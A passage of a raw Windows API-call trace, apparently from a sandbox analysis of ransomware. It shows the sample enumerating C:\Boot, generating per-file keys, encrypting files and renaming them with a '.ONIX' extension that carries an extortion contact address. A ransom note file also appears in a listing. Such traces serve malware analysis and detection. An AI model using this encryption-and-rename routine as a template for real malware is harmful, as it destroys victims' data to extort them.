(dwErrCode=0x0) [0064.993] GetLastError () returned 0x0 [0064.993] SetLastError (dwErrCode=0x0) [0064.993] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457db8 [0064.993] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0064.993] GetLastError () returned 0x0 [0064.993] SetLastError (dwErrCode=0x0) [0064.993] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470a68 [0064.993] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470b80 [0064.993] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0064.993] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0064.993] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470b80 | out: hHeap=0x410000) returned 1 [0064.993] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470a68 | out: hHeap=0x410000) returned 1 [0064.993] FindNextFileW (in: hFindFile=0x447b68, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3064ec90, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x3064ec90, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3064ec90, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0064.993] CloseHandle (hObject=0x3cc) returned 1 [0064.993] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0064.994] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x4, wMilliseconds=0x284)) [0064.994] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0064.994] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0064.994] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0064.994] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Boot9c354ca09c354b444c.lock") returned 31 [0064.994] CreateFileW (lpFileName="C:\\\\Boot9c354ca09c354b444c.lock" (normalized: "c:\\boot9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0064.994] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0064.994] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0064.995] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cae0 [0064.995] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470b48 | out: hHeap=0x410000) returned 1 [0064.995] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x471fb0 | out: hHeap=0x410000) returned 1 [0064.995] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472000 | out: hHeap=0x410000) returned 1 [0064.995] FindFirstFileW (in: lpFileName="C:\\\\Boot\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x30674df0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30674df0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x447ba8 [0064.995] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457db8 | out: hHeap=0x410000) returned 1 [0064.995] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0064.995] GetLastError () returned 0x0 [0064.995] SetLastError (dwErrCode=0x0) [0064.995] GetLastError () returned 0x0 [0064.995] SetLastError (dwErrCode=0x0) [0064.995] GetLastError () returned 0x0 [0064.995] SetLastError (dwErrCode=0x0) [0064.995] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470b48 [0064.995] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b2c8 [0064.995] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b2c8 | out: hHeap=0x410000) returned 1 [0064.995] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472000 [0064.995] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x447be8 [0064.995] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x447be8 | out: hHeap=0x410000) returned 1 [0064.995] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0064.995] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0064.995] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472000 | out: hHeap=0x410000) returned 1 [0064.995] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470b48 | out: hHeap=0x410000) returned 1 [0064.995] FindNextFileW (in: hFindFile=0x447ba8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x30674df0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30674df0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.995] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0064.995] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0064.995] GetLastError () returned 0x0 [0064.995] SetLastError (dwErrCode=0x0) [0064.995] GetLastError () returned 0x0 [0064.996] SetLastError (dwErrCode=0x0) [0064.996] GetLastError () returned 0x0 [0064.996] SetLastError (dwErrCode=0x0) [0064.996] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470b48 [0064.996] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b2c8 [0064.996] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b2c8 | out: hHeap=0x410000) returned 1 [0064.996] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472000 [0064.996] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x447be8 [0064.996] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x447be8 | out: hHeap=0x410000) returned 1 [0064.996] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0064.996] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0064.996] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472000 | out: hHeap=0x410000) returned 1 [0064.996] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470b48 | out: hHeap=0x410000) returned 1 [0064.996] FindNextFileW (in: hFindFile=0x447ba8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x90cd45e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x90cd45e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0064.996] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0064.996] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0064.996] GetLastError () returned 0x0 [0064.996] SetLastError (dwErrCode=0x0) [0064.996] GetLastError () returned 0x0 [0064.996] SetLastError (dwErrCode=0x0) [0064.996] GetLastError () returned 0x0 [0064.996] SetLastError (dwErrCode=0x0) [0064.996] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470b48 [0064.996] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0064.996] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0064.996] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470b48 | out: hHeap=0x410000) returned 1 [0064.996] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472000 [0064.996] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x47f170 [0064.996] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466588 [0064.996] CreateFileW (lpFileName="C:\\\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0064.996] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0064.997] CreateFileW (lpFileName="C:\\\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0064.997] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0064.997] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x47f170 | out: pbBuffer=0x47f170) returned 1 [0064.997] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x466588 | out: pbBuffer=0x466588) returned 1 [0064.997] SetFileAttributesW (lpFileName="C:\\\\Boot\\BCD", dwFileAttributes=0x80) returned 1 [0064.997] lstrlenW (lpString="C:\\\\Boot\\BCD") returned 12 [0064.997] GetProcessHeap () returned 0x410000 [0064.997] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x88) returned 0x43e3f8 [0064.997] lstrcpyW (in: lpString1=0x43e3f8, lpString2="C:\\\\Boot\\BCD" | out: lpString1="C:\\\\Boot\\BCD") returned="C:\\\\Boot\\BCD" [0064.997] lstrcatW (in: lpString1="C:\\\\Boot\\BCD", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Boot\\BCD.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Boot\\BCD.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0064.997] GetProcessHeap () returned 0x410000 [0064.997] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0064.997] CloseHandle (hObject=0xffffffff) returned 0 [0064.997] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472000 | out: hHeap=0x410000) returned 1 [0064.997] FindNextFileW (in: hFindFile=0x447ba8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x9098e7a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0064.998] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0064.998] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0064.998] GetLastError () returned 0x6 [0064.998] SetLastError (dwErrCode=0x6) [0064.998] GetLastError () returned 0x6 [0064.998] SetLastError (dwErrCode=0x6) [0064.998] GetLastError () returned 0x6 [0064.998] SetLastError (dwErrCode=0x6) [0064.998] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470b48 [0064.998] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0064.998] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0064.998] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470b48 | out: hHeap=0x410000) returned 1 [0064.998] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470b48 [0064.998] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x47f278 [0064.998] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466598 [0064.998] CreateFileW (lpFileName="C:\\\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0064.998] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0064.998] CreateFileW (lpFileName="C:\\\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0064.998] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0064.998] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x47f278 | out: pbBuffer=0x47f278) returned 1 [0064.999] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x466598 | out: pbBuffer=0x466598) returned 1 [0064.999] SetFileAttributesW (lpFileName="C:\\\\Boot\\BCD.LOG", dwFileAttributes=0x80) returned 1 [0064.999] lstrlenW (lpString="C:\\\\Boot\\BCD.LOG") returned 16 [0064.999] GetProcessHeap () returned 0x410000 [0064.999] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x90) returned 0x43e3f8 [0064.999] lstrcpyW (in: lpString1=0x43e3f8, lpString2="C:\\\\Boot\\BCD.LOG" | out: lpString1="C:\\\\Boot\\BCD.LOG") returned="C:\\\\Boot\\BCD.LOG" [0064.999] lstrcatW (in: lpString1="C:\\\\Boot\\BCD.LOG", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Boot\\BCD.LOG.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Boot\\BCD.LOG.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0064.999] GetProcessHeap () returned 0x410000 [0064.999] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0064.999] CloseHandle (hObject=0xffffffff) returned 0 [0064.999] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470b48 | out: hHeap=0x410000) returned 1 [0064.999] FindNextFileW (in: hFindFile=0x447ba8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0064.999] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0064.999] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0064.999] GetLastError () returned 0x6 [0064.999] SetLastError (dwErrCode=0x6) [0064.999] GetLastError () returned 0x6 [0064.999] SetLastError (dwErrCode=0x6) [0064.999] GetLastError () returned 0x6 [0064.999] SetLastError (dwErrCode=0x6) [0064.999] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472000 [0064.999] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470b48 [0064.999] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0064.999] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0064.999] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470b48 | out: hHeap=0x410000) returned 1 [0064.999] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472000 | out: hHeap=0x410000) returned 1 [0064.999] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470b48 [0064.999] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x47f380 [0064.999] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665a8 [0064.999] CreateFileW (lpFileName="C:\\\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x3dc [0065.000] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.000] LockFile (hFile=0x3dc, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x0, nNumberOfBytesToLockHigh=0x0) returned 1 [0065.000] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0065.000] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.000] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x47f380 | out: pbBuffer=0x47f380) returned 1 [0065.000] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4665a8 | out: pbBuffer=0x4665a8) returned 1 [0065.000] SetFileAttributesW (lpFileName="C:\\\\Boot\\BCD.LOG1", dwFileAttributes=0x80) returned 1 [0065.000] lstrlenW (lpString="C:\\\\Boot\\BCD.LOG1") returned 17 [0065.000] GetProcessHeap () returned 0x410000 [0065.000] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x92) returned 0x43e3f8 [0065.000] lstrcpyW (in: lpString1=0x43e3f8, lpString2="C:\\\\Boot\\BCD.LOG1" | out: lpString1="C:\\\\Boot\\BCD.LOG1") returned="C:\\\\Boot\\BCD.LOG1" [0065.001] lstrcatW (in: lpString1="C:\\\\Boot\\BCD.LOG1", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Boot\\BCD.LOG1.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Boot\\BCD.LOG1.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0065.001] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=0) returned 1 [0065.001] SetFilePointer (in: hFile=0x3dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x0 [0065.001] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0065.001] GetProcessHeap () returned 0x410000 [0065.001] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x47f488 [0065.001] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47f488*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x47f488*, pdwDataLen=0x367f414*=0x100) returned 1 [0065.001] WriteFile (in: hFile=0x3dc, lpBuffer=0x47f488*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x47f488*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0065.006] WriteFile (in: hFile=0x3dc, lpBuffer=0x4665a8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4665a8*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0065.009] WriteFile (in: hFile=0x3dc, lpBuffer=0x4665a8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4665a8*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0065.010] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1) returned 0x4665b8 [0065.010] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1) returned 0x4665c8 [0065.010] SetFilePointer (in: hFile=0x3dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.010] ReadFile (in: hFile=0x3dc, lpBuffer=0x4665b8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4665b8*, lpNumberOfBytesRead=0x367f44c*=0x0, lpOverlapped=0x0) returned 1 [0065.010] SetFilePointer (in: hFile=0x3dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.010] WriteFile (in: hFile=0x3dc, lpBuffer=0x4665c8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4665c8*, lpNumberOfBytesWritten=0x367f44c*=0x0, lpOverlapped=0x0) returned 1 [0065.011] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665b8 | out: hHeap=0x410000) returned 1 [0065.011] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665c8 | out: hHeap=0x410000) returned 1 [0065.011] UnlockFile (hFile=0x3dc, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x0, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0065.011] CloseHandle (hObject=0x3dc) returned 1 [0065.012] GetProcessHeap () returned 0x410000 [0065.012] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f488 | out: hHeap=0x410000) returned 1 [0065.012] MoveFileExW (lpExistingFileName="C:\\\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), lpNewFileName="C:\\\\Boot\\BCD.LOG1.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\boot\\bcd.log1.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0065.014] GetProcessHeap () returned 0x410000 [0065.014] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0065.014] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f380 | out: hHeap=0x410000) returned 1 [0065.014] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665a8 | out: hHeap=0x410000) returned 1 [0065.014] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470b48 | out: hHeap=0x410000) returned 1 [0065.014] FindNextFileW (in: hFindFile=0x447ba8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0065.014] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.014] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.014] GetLastError () returned 0x0 [0065.014] SetLastError (dwErrCode=0x0) [0065.014] GetLastError () returned 0x0 [0065.014] SetLastError (dwErrCode=0x0) [0065.014] GetLastError () returned 0x0 [0065.014] SetLastError (dwErrCode=0x0) [0065.014] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472000 [0065.014] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470b48 [0065.014] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.014] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0065.014] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470b48 | out: hHeap=0x410000) returned 1 [0065.014] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472000 | out: hHeap=0x410000) returned 1 [0065.014] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470b48 [0065.014] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x47f380 [0065.015] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665a8 [0065.015] CreateFileW (lpFileName="C:\\\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x3dc [0065.015] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.015] LockFile (hFile=0x3dc, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x0, nNumberOfBytesToLockHigh=0x0) returned 1 [0065.015] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0065.015] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.015] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x47f380 | out: pbBuffer=0x47f380) returned 1 [0065.015] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4665a8 | out: pbBuffer=0x4665a8) returned 1 [0065.015] SetFileAttributesW (lpFileName="C:\\\\Boot\\BCD.LOG2", dwFileAttributes=0x80) returned 1 [0065.015] lstrlenW (lpString="C:\\\\Boot\\BCD.LOG2") returned 17 [0065.015] GetProcessHeap () returned 0x410000 [0065.015] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x92) returned 0x43e3f8 